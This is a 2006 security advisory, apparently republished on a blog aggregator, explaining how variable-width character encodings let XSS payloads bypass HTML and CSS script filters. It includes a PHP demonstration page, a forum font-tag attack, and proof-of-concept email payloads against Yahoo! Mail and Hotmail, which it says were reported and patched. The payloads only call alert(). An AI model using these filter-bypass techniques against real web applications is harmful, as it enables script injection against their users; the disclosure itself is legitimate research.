zoukankan      html  css  js  c++  java
  • Bypassing script filters with variablewidth encodings

    Author: Cheng Peng Su (applesoup_at_gmail.com)
    Date: August 7, 2006


    We've all known that the main problem of constructing XSS attacks is
    how to obfuscate malicious code. In the following paragraphs I will

    attempt to explain the concept of bypassing script filters with
    variable-width encodings, and disclose the applications of this
    concept to

    Hotmail and Yahoo! Mail web-based mail services.


    Variable-width encoding Introduction
    ====================================

    A variable-width encoding(a.k.a variable-length encoding) is a type of
    character encoding scheme in which codes of differing lengths are

    used to encode a character set. Most common variable-width encodings
    are multibyte encodings, which use varying numbers of bytes to encode

    different characters. The first use of multibyte encodings was for the
    encoding of Chinese, Japanese and Korean, which have large character

    sets well in excess of 256 characters. The Unicode standard has two
    variable-width encodings: UTF-8 and UTF-16. The most commonly-used

    codes are two-byte codes. The EUC-CN form of GB2312, plus EUC-JP and
    EUC-KR, are examples of such two-byte EUC codes. And there are also

    some three-byte and four-byte codes.


    Example and Discussion
    ======================

    The following is a php file from which I will start to introduce my idea.

    ------------------------------example.php--------------------------------

    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    </head>
    <body>
    <?

    for($i=0;$i<256;$i++){
    echo "Char $i is <font face=\"xyz".chr($i)."\">not </font>"
         ."<font face=\" onmouseover=alert($i) notexist=".chr($i)."\"     >"
          // NOTE: 5 space characters following the last \"
         ."available</font>\r\n\r\n<br>\r\n\r\n";
    }

    ?>
    </body>
    </html>

    -------------------------------------------------------------------------

    For most values of $i, Internet Explorer 6.0(SP2) will display "Char
    XXX is not available". When $i is between 192(0xC0) and 255(0xFF), you

    can see "Char XXX is available". Let's take $i=0xC0 for example,
    consider the following code:

    Char 192 is <font face="xyz[0xC0]">not </font><font face="
    onmouseover=alert(192) s=[0xC0]"     >available</font>

    0xC0 is one of the 32 first bytes of 2-byte sequences (0xC0-0xDF) in
    UTF-8. So when IE parses the above code, it will consider 0xC0 and the

    following quote as a sequence, and therefore these two pairs of FONT
    elements will become one with "xyz[0xC0]">not </font><font face=" as

    the value of FACE parameter. The second 0xC0 will start another 2-byte
    sequence as a value of NOTEXIST parameter which is not quoted. Due

    to a space character following by the quote, 0xE0-0xEF which are first
    bytes of 3-byte sequences, together with the following quote and one

    space character will be considered as the value of NOTEXIST parameter.
    And each of the first bytes of 4-byte sequences(0xF0-0xF7), 5-byte

    sequences(0xF8-0xFB), 6-byte sequences(0xFC-0xFD), together with the
    following quote and space characters will be considered as one

    sequence.

    Here are the results of the above code parsed by Internet Explorer
    6.0(SP2), Firefox 1.5.0.6 and Opera 9.0.1 in different variable-width

    encodings respectively. Note that the numbers in the table are the
    ranges of "available" characters.

    +-----------+-----------+-----------+-----------+
    |           | IE        | FF        | OP        |
    +-----------+-----------+-----------+-----------+
    | UTF-8     | 0xC0-0xFF | none      | none      |
    +-----------+-----------+-----------+-----------+
    | GB2312    | 0x81-0xFE | none      | 0x81-0xFE |
    +-----------+-----------+-----------+-----------+
    | GB18030   | none      | none      | 0x81-0xFE |
    +-----------+-----------+-----------+-----------+
    | BIG5      | 0x81-0xFE | none      | 0x81-0xFE |
    +-----------+-----------+-----------+-----------+
    | EUC-KR    | 0x81-0xFE | none      | 0x81-0xFE |
    +-----------+-----------+-----------+-----------+
    | EUC-JP    | 0x81-0x8D | 0x8F      | 0x8E      |
    |           | 0x8F-0x9F |           | 0x8F      |
    |           | 0xA1-0xFE |           | 0xA1-0xFE |
    +-----------+-----------+-----------+-----------+
    | SHIFT_JIS | 0x81-0x9F | 0x81-0x9F | 0x81-0x9F |
    |           | 0xE0-0xFC | 0xE0-0xFC | 0xE0-0xFC |
    +-----------+-----------+-----------+-----------+


    Application
    ===========

    I don't think there is a typical exploitation of bypassing script
    filters with variable-width encodings, because the exploitation is
    very

    flexible. But you just need to remember that if the webapp use
    variable-width encodings, you can bury some characters following by
    your

    entry, and the buried characters might be very crucial.

    The above code might be exploited in general webapps which allow you
    to add formatting to your entry in the same way as HTML does. For

    example, in some forums, [font=Courier New]message[/font] in your
    message will be transformed into <font face="Courier
    New">message</font>.

    Supposing it use UTF-8, we can attack by sending

    [font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert()
    s=[0xC0]]exploited[/font]

    And it will be tranformed into

    <font face="xyz[0xC0]">buried</font><font face="abc
    onmouseover=alert() s=[0xC0]">exploited</font>

    Again, the exploitation is very flexible, this FONT-FONT example is
    just an enlightening one. The following exploitaion to Yahoo! Mail is

    quite different from this one.


    Disclosure
    ==========

    Using this method, I have found two XSS vulnerabilities in Hotmail and
    Yahoo! Mail web-based mail services. I informed Yahoo and Microsoft

    on April 30 and May 12 respectively. And they have patched the vulnerabilities.

    Yahoo! Mail XSS
    ---------------

    Before I discovered this vulnerability, Yahoo! Mail filtering engine
    could block "expression()" syntax in a CSS attribute using a comment

    to break up expression( expr/* */ession() ). I used [0x81] with the
    following asterisk to make a sequence, so that the second */ would

    close the comment. But the filtering engine considered the first two
    comment symbol as a pair.

    --------------------------------------------------------------------
    MIME-Version: 1.0
    From: user<user@site.com>
    Content-Type: text/html; charset=GB2312
    Subject: example

    <span style='expr/*[0x81]*/*/ession(alert())'>exploited</span>
    .
    --------------------------------------------------------------------

    Hotmail XSS
    -----------

    This exploitation is almost the same as the example.php.

    --------------------------------------------------------------------
    MIME-Version: 1.0
    From: user<user@site.com>
    Content-Type: text/html; charset=SHIFT_JIS
    Subject: example

    <font face="[0x81]"></font><font face=" onmouseover=alert()
    s=[0x81]">exploited</font>
    .
    --------------------------------------------------------------------


    Reference
    =========

    Wikipedia:Variable-width
    encoding(http://en.wikipedia.org/wiki/Variable-width_encoding)
    RFC 3629, the UTF-8 standard(http://tools.ietf.org/html/rfc3629)
    RSnake:XSS Cheat Sheet(http://ha.ckers.org/xss.html)


    ( Original text: http://applesoup.googlepages.com/bypass_filter.txt )
  • 相关阅读:
    golang通知协程退出
    Linux Centos7下安装Elasticsearch
    es
    Laravel 别名 Facades的用法
    SVN使用时遇到的小问题
    http 重定向到 https
    Git-版本回退
    selenium---上传文件(非input标签)
    selenium---生成BeautifulReport报告
    windows搭建ngnix图片服务器
  • 原文地址:https://www.cnblogs.com/Safe3/p/1242675.html
Copyright © 2011-2022 走看看